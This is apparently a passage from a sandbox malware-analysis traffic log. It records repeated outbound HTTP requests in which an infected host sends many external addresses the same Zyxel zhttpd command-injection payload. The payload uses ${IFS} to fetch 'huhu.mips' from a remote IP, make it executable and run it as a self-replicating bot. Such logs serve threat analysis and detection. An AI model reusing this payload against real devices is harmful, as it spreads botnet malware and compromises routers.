                                                  Jan 19, 2024 18:23:47.887916088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2410192.168.2.134629234.13.15.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887948990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2411192.168.2.1339426166.126.63.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887996912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2412192.168.2.13581604.101.84.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888060093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2413192.168.2.1360780187.151.129.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888092995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2414192.168.2.1358860184.12.238.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888120890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2415192.168.2.1345908107.174.113.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888150930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2416192.168.2.135191895.164.65.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888180017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2417192.168.2.1350134123.54.196.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888220072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2418192.168.2.1345568151.246.37.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888253927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2419192.168.2.1342588164.118.221.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888314009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2420192.168.2.1334718168.193.161.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888362885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2421192.168.2.134787461.5.153.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888403893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2422192.168.2.1335274182.79.8.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888433933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2423192.168.2.134511070.172.91.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888477087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2424192.168.2.135788257.134.239.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888524055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2425192.168.2.133458680.125.73.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888575077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2426192.168.2.133702273.185.255.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888618946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2427192.168.2.135276213.4.104.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888672113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2428192.168.2.136051442.18.196.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888727903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2429192.168.2.135272870.7.62.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888757944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2430192.168.2.136039882.190.255.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888823986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2431192.168.2.1348826158.187.173.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888859987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2432192.168.2.1348086131.227.216.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888884068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2433192.168.2.133515650.205.159.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888927937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2434192.168.2.133757051.88.89.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888962984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2435192.168.2.134425852.136.70.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.888997078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2436192.168.2.133630618.197.145.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889017105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2437192.168.2.1356406147.226.127.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889091015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2438192.168.2.135433653.83.92.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889151096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2439192.168.2.1344248131.183.231.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889170885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2440192.168.2.1358942170.253.205.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889215946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2441192.168.2.134999270.130.7.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889278889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2442192.168.2.134424466.192.127.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889328003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2443192.168.2.1348264150.23.117.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889349937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2444192.168.2.133558669.92.225.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889502048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2445192.168.2.1335758161.234.237.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889524937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2446192.168.2.1356496105.87.87.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889575005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2447192.168.2.134831819.36.216.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889615059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2448192.168.2.135351289.229.45.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889641047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2449192.168.2.135331218.121.186.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889687061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2450192.168.2.1357656140.94.113.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889739037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2451192.168.2.1337332167.15.193.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889764071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2452192.168.2.1345854109.29.172.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889816999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2453192.168.2.1334424207.114.100.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889846087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2454192.168.2.1346110125.192.143.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889879942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2455192.168.2.136084249.187.23.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889930964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2456192.168.2.134325042.131.49.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889960051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2457192.168.2.1346164189.228.246.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.889991045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2458192.168.2.1355488142.238.33.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890037060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2459192.168.2.135247842.75.194.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890057087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2460192.168.2.1338494156.27.231.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890120983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2461192.168.2.133985479.167.62.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890173912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2462192.168.2.1359686169.143.41.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890208960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2463192.168.2.1336352205.94.155.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890244007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2464192.168.2.1338828196.106.116.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890271902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2465192.168.2.13327882.238.96.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890310049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2466192.168.2.134147840.30.170.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890348911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2467192.168.2.1346700223.195.255.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890371084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2468192.168.2.133971863.150.112.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890428066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2469192.168.2.135815223.108.14.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890465975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2470192.168.2.1343994219.141.46.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890511036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2471192.168.2.1350784209.189.164.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.890568972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2472192.168.2.1355330159.112.180.84443
                                                  TimestampBytes transferredDirectionData
